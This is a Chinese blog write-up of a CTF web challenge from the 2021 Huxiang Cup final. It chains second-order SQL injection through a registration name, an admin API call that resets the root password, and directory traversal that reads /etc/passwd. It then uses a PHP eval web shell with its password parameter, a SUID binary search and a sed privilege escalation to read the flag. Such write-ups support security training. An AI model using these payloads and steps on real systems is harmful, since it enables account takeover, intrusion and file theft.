[湖湘杯 2021 final]Penetratable

已于 2024-04-17 17:55:06 修改
阅读量826 收藏 17
点赞数 14
文章标签: web安全
于 2024-04-17 17:35:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46603839/article/details/137874513
版权

题目描述

  • SUID提权
  • 二次注入
  • 目录穿越

解题思路

打开题目 第一个入眼参数是id; 尝试注入 没有结果 尝试别的参数 2、3等 发现admin 再点击右侧用户图标 出现注册登录

在这里插入图片描述
进行注册登录 同时进行目录扫描
注册 123 123 123用户 url的?id=3也有了结果
查看扫描的目录 查看后都是php文件 也无法看到源码;
在这里插入图片描述
从/static中查看user.html 应该user.html也就是登录成功的页面
在这里插入图片描述
对登录进行注入 没有成果 看着这个页面 用户是用%s直接传的参在页面改不了 直接bp抓包 再试试能不能注入
在这里插入图片描述
抓包结果

POST /?c=user&m=updateUserInfo HTTP/1.1
Host: node4.anna.nssctf.cn:28085
Content-Length: 119
Accept: text/plain, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://node4.anna.nssctf.cn:28085
Referer: http://node4.anna.nssctf.cn:28085/?c=user
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=25abefe8a5aeddd2956a27286bbb15a7; td_cookie=1849363639
Connection: close

name=MTIzNA%3D%3D&newPass=140f6969d5213fd0ece03148e62e461e&oldPass=81dc9bdb52d04dc20036dbd8313ed055&saying=MTIzNA%3D%3D

不能改的两参数 一看%3d就是base64 另外两个密码有点像md5 直接js找请求 从爬虫角度xhr断点 跟栈 找到加密点 同时看出这个js主要是围绕rootadmin展开的果然是MD5 知道加密了 试试注入 改了参数后返回响应 没有权限 或者密码错误

function login(){
    let name=encodeURIComponent(Base64.encode($(".form-floating>input").eq(0).val()))
    let pass=hex_md5($(".form-floating>input").eq(1).val())
    $.ajax({
        url: '/?c=app&m=login',
        type: 'post',
        data: 'name=' + name+'&pass=' + pass,
        // async:true,
        dataType: 'text',
        success: function(data){
            let res=$.parseJSON(data);
            if (res['login']){
                switch (res['type']){
                    case 'user': location.href="/?c=user"; break;
                    case 'admin': location.href="/?c=admin"; break;
                    case 'root': location.href="/?c=root"; break;
                }
            }else if(res['alertFlag']){
                alert(res['alertData']);
            }
        }
    });
}

function userUpdateInfo(){
    let name=encodeURIComponent(Base64.encode($(".input-group>input").eq(0).val()))
    let oldPass=$(".input-group>input").eq(1).val()?hex_md5($(".input-group>input").eq(1).val()):'';
    let newPass=$(".input-group>input").eq(2).val()?hex_md5($(".input-group>input").eq(2).val()):'';
    let saying=encodeURIComponent(Base64.encode($(".input-group>input").eq(3).val()))
    $.ajax({
        url: '/?c=user&m=updateUserInfo',
        type: 'post',
        data: 'name='+name+'&newPass='+newPass+'&oldPass='+oldPass+'&saying='+saying,
        // async:true,
        dataType: 'text',
        success: function(data){
            alertHandle(data);
        }
    });
}

function signOut(){
    $.ajax({
        url: '/?c=app&m=signOut',
        type: 'get',
        dataType: 'text',
        success: function(data){
            alertHandle(data);
        }
    });
}

function alertHandle(data){
    let res=$.parseJSON(data);
    if(res['alertFlag']){
        alert(res['alertData']);
    }
    if(res['location']){
        location.href=res['location'];
    }
}

function changeAdminPage(type){
    let page=$('.page').text();
    if (type=='next'){
        location.href='?c=admin&m=getUserList&page='+(parseInt(page)+1);
    }
    if (type=='last'){
        location.href='?c=admin&m=getUserList&page='+(parseInt(page)-1);
    }
}
function changeRootPage(type){
    let page=$('.page').text();
    if (type=='next'){
        location.href='?c=root&m=getUserInfo&page='+(parseInt(page)+1);
    }
    if (type=='last'){
        location.href='?c=root&m=getUserInfo&page='+(parseInt(page)-1);
    }
}

function updatePass(){
    // let name=encodeURIComponent(Base64.encode($(".input-group>input").eq(0).val()))
    // let oldPass=$(".input-group>input").eq(1).val()?hex_md5($(".input-group>input").eq(1).val()):'';
    // let newPass=$(".input-group>input").eq(2).val()?hex_md5($(".input-group>input").eq(2).val()):'';
    // let saying=encodeURIComponent(Base64.encode($(".input-group>input").eq(3).val()))
    // $.ajax({
    //     url: '/?c=admin&m=updatePass',
    //     type: 'post',
    //     data: 'name='+name+'&newPass='+newPass+'&oldPass='+oldPass+'&saying='+saying,
    //     // async:true,
    //     dataType: 'text',
    //     success: function(data){
    //         alertHandle(data);
    //     }
    // });
}

function adminHome(){
    location.href='/?c=root'
}

function getUserInfo(){
    location.href='/?c=root&m=getUserInfo'
}

function getLogList(){
    location.href='/?c=root&m=getLogList'
}

function downloadLog(filename){
    location.href='/?c=root&m=downloadRequestLog&filename='+filename;
}

function register(){
    let name=encodeURIComponent(Base64.encode($(".form-floating>input").eq(2).val()))
    let pass=hex_md5($(".form-floating>input").eq(3).val())
    let saying=encodeURIComponent(Base64.encode($(".form-floating>input").eq(4).val()))
    $.ajax({
        url: '/?c=app&m=register',
        type: 'post',
        data: 'name=' + name+'&pass=' + pass +'&saying=' +saying,
        dataType: 'text',
        success: function(data){
            // console.log(data);
            alertHandle(data);
        }
    });
}

再考虑到提示二次注入 现在看 就四个注入点首页id、注册、登录、登录成功后的修改密码
从本题看 是写入insert和读取select造成的注入(我记得攻防世界有一道二次注入 是写入insert 和修改update 直接结合进行改文件名 题目忘记了)
对注册进行构造name=admin" – + 再进行登录
在这里插入图片描述
试试修改密码后 能否使用 admin 能不能登录 登陆成功后发现admin是不允许修改的密码的 同时参数多了两个页面?c=admin和?c=admin&m=getUserList 在这里插入图片描述
第二个页面显示账号信息 但是没有root用户 同样的方法试试root
但是返回 没有权限 猜测应该是参数?c=user的原因
考虑到admin页面的情况以及js代码中的注释 用用admin的api试试
这里一定要改cookie不然就会这样。。。。
在这里插入图片描述

POST /?c=admin&m=updatePass HTTP/1.1
Host: node4.anna.nssctf.cn:28114
Content-Length: 119
Accept: text/plain, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://node4.anna.nssctf.cn:28114
Referer: http://node4.anna.nssctf.cn:28114/?c=user
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=25abefe8a5aeddd2956a27286bbb15a7; td_cookie=1854722386
Connection: close

name=cm9vdA%3D%3D&newPass=81dc9bdb52d04dc20036dbd8313ed055&oldPass=81dc9bdb52d04dc20036dbd8313ed055&saying=MTIzNA%3D%3D

修改成功后就是登录root 增加了一个?c=root&m=getLogList页面 可以进行下载 下载的文件是日志 试试能不能下载别的 结合之前扫描爆出来的那几个目录试试 然后找了好久都返回文件不存在 参考参考别人wp 人家找文件就好对找

../../../../../etc/passwd
../../../../../var/www/html/phpinfo.php

找到shell:

<?php 
if(md5(@$_GET['pass_31d5df001717'])==='3fde6bb0541387e4ebdadf7c2ff31123'){@eval($_GET['cc']);} 
// hint: Checker will not detect the existence of phpinfo.php, please delete the file when fixing the vulnerability.
?>

在这里插入图片描述
可以直接执行 也可以用蚁剑连它
我用的是蚁剑(使用post 还要加个post参数)直接连
http://node4.anna.nssctf.cn:28114/phpinfo.php/?pass_31d5df001717=1q2w3e&cc=eval($_POST[‘cc’]);
密码cc

我说怎么找不到呢。。。。。。。
在这里插入图片描述

在根目录找到flag 打开没东西 那就是提权了 提示是SUID提权 那就搜索吧

find / -user root -perm -4000 -print 2>/dev/null#查找拥有suid的二进制文件

在这里插入图片描述
在这里插入图片描述

/bin/sed '' /flag   #读取
晓雨风声
关注
  • 14
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
final2021:决赛2021
04-09
决赛2021 决赛2021
Solution2021_Final
04-12
《CSS在Solution2021_Final中的应用与实践》 在信息技术领域,CSS(层叠样式表)作为网页设计的核心技术之一,对于构建美观、功能丰富的网页起着至关重要的作用。"Solution2021_Final"项目正是这样一个充分运用CSS...
CTF 湖湘 决赛 2021 final.zip
12-07
CTF 湖湘 决赛 2021 final
[湖湘 2021 final]Penetratable-----记suid提权
qq_73767109的博客
06-24 334
于是可以根据这个发包对里面的data改写成root的,这要登录在admin下进行修改,因为root没有权限哪只能是admin有。sed命令来自英文词组“stream editor”的缩写,其功能是用于利用语法/脚本对文本文件进行批量的编辑操作。可以看到有目录泄露,经过读取有static里可以看到有用信息其他的都说php文件读取后没有回显。但是用同样的方式发现不能对root进行修改密码导致不能登录root。这样意思是在admin下修改root的密码,这里修改为root。登录后暂时没有发现什么有用的信息。
2021-湖湘final-Web
feng的博客
01-05 2099
2021-湖湘final-Web 前言 今年湖湘报的社企组的结果就是最后只能摆烂,然后决赛那段时间正好在复习期末,然后考完了想好好的休息一段时间,打游戏打累了再来复现一下湖湘final的题目放松放松。 vote 今年HTB的基本上算是原题了,复现的时候才发现当时做那题的时候就摆烂没管了,所以一点印象没有。。。 const path = require('path'); const express = require('express'); const pug
2023 羊城 final
11-21
附件
final_EDEM2021.2Fluent2021R1coupling.zip
02-25
"final_EDEM 2021.2 Fluent 2021 R1 coupling"这个压缩包文件包含了关于这两个软件如何进行耦合模拟的详细信息,这在工程设计和科学研究中具有广泛的应用价值。 EDEM 2021.2是EDEM软件的最新版本,它提供了一种高度...
刷题日记 date 6.7
m0_64348326的博客
06-07 103
这种方式我刚开始在普通用户的测试越权时试过是不行的,可能是由于这个账号是admin的原因导致这种方式又能成功越权执行了。而这两个功能是在类Notes中,node.js的类实际上还是语法糖,本质还是函数。1.先注册个用户,进入后台发现有修改密码的地方,抓包查看是否有逻辑越权,但是由于需要旧密码,导致这步失败了。4.注意到管理员的修改密码功能被禁止了,查看req.js文件,找到了一段js,这里有隐藏的修改密码接口。一次包含,这个我是真没猜到,因为啥提示都没有,我猜测的是可能设置了文件读写权限。
WEB刷题-md
最新发布
m0_73373164的博客
03-09 1560
这个题对我来说真的有难度,这个题的步骤是这样的,一开始进行目录扫描,扫到了phpinfo.php和一些没有用的,看源码static可以看到很多js代码,这些js代码里面有一个req可以查看到账号信息和调用函数,知道了admin账号能够修改账号密码,root用户能够下载文件,user和app用户什么都干不了,那我们首先的目标是是看admin上面有没有突破口了。然后即可执行命令有两种方法可以执行,如sort和使用\转义可能会好奇那个\不是过滤了反斜杠了吗,对的但是我们传进去的样子是经过转义的这个是无法过滤的。
2021年--湖湘--final
unexpectedthing的博客
04-28 1364
21年湖湘比赛
2021湖湘wp_web
meteox的博客
11-15 4184
easywill will框架,版本是1.51,直接gitee下载源码回退版本即可https://gitee.com/willphp/willphpv2 该框架参考了thinkphp,开头首页给出了assign($name,$value)渲染,然后return了view(),thinkphp有个相关的文件包含漏洞和这个很像 https://www.freebuf.com/column/207878.html 从view->fetch->render->renderTo逐步跟进,发现有变量覆
2021湖湘WEB
~airrudder~
03-02 829
文章目录2021 湖湘MultistaeAgencyPenetratablevote 2021 湖湘 MultistaeAgency 分析参考文章:2021湖湘决赛-MultistageAgency。 一道 Golang 的题目,附件目录结构如下所示: tree . ├── Dockerfile ├── dist │ ├── index.html │ └── static │ ├── css │ │ ├── app.21c401bdac17302cdde185ab
CTF刷题-汇总
热门推荐
~airrudder~
04-09 1万+
BUUCTF平台的刷题之旅 Web
[CTF复现]湖湘2021
anwen12的博客
12-14 3786
go_web 今天又是学爆guoke哥哥博客的一天 0x01 MultistageAgency 通过看源码 我们发现 这个题是三个服务 su - web -c "/code/bin/web 2>&1 >/code/logs/web.log &" su - web -c "/code/bin/proxy 2>&1 >/code/logs/proxy.log &" /code/bin/server 2>&1 >/code/log
湖湘2021-pwn-final部分复现
qq_53062301的博客
12-09 4921
第一次参加awd+,虽然成绩不是很好(大佬太多被打烂了),有很多收获,awd+赛制中可以通过攻击和防御两个手段来得分,攻击的话就是类似于正常的ctf,只不过如果成功攻击后,平台会使用官方的exp来去打全场,就是如果攻击成功,每轮(这次湖湘是20分钟一轮)都会获得攻击得分,得分会随着做题成功人数增多而减少,防御的话就是patch一下程序,然后通过ftp上传到服务器上,然后申请防御,也是防御成功就会每轮都会得分,但是防御有三种情况,一种是exp利用成功,也就是没有防御成功,还有一种清况,就是c...
[HXBCTF 2021]湖湘easywill
weixin_45751765的博客
12-01 3679
0x00 前言 这次接触到pear有点陌生 先本地弄弄 参考师傅 https://blog.csdn.net/rfrder/article/details/121042290 啥是Pear? pear (全称为PHP扩展与应用库) 1.如前所述,PEAR按照一定的分类来管理PEAR应用代码库,你的PEAR代码可以组织到其中适当的目录中,其他的人可以方便地检索并分享到你的成果。 2.PEAR不仅仅是一个代码仓库,它同时也是一个标准,使用这个标准来书写你的PHP代码,将会增强你的程序的可读性,复用性,减少
nssctf的jwt问3
08-17
首先将图像的背景填充为白色。 2. 在保存图片时,使用 `ImageIO.write()` 方法将二维码图像保存为 PNG 格式的图片文件。 3. 请确保您已经导入 `java.awt.image抱歉,我无法回答有关 nssctf 的问题。我是一个与开发者有关的 AI,.BufferedImage` 和 `javax.imageio.ImageIO` 类。 您可以根据需要修改保存图片的路径和文件名。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值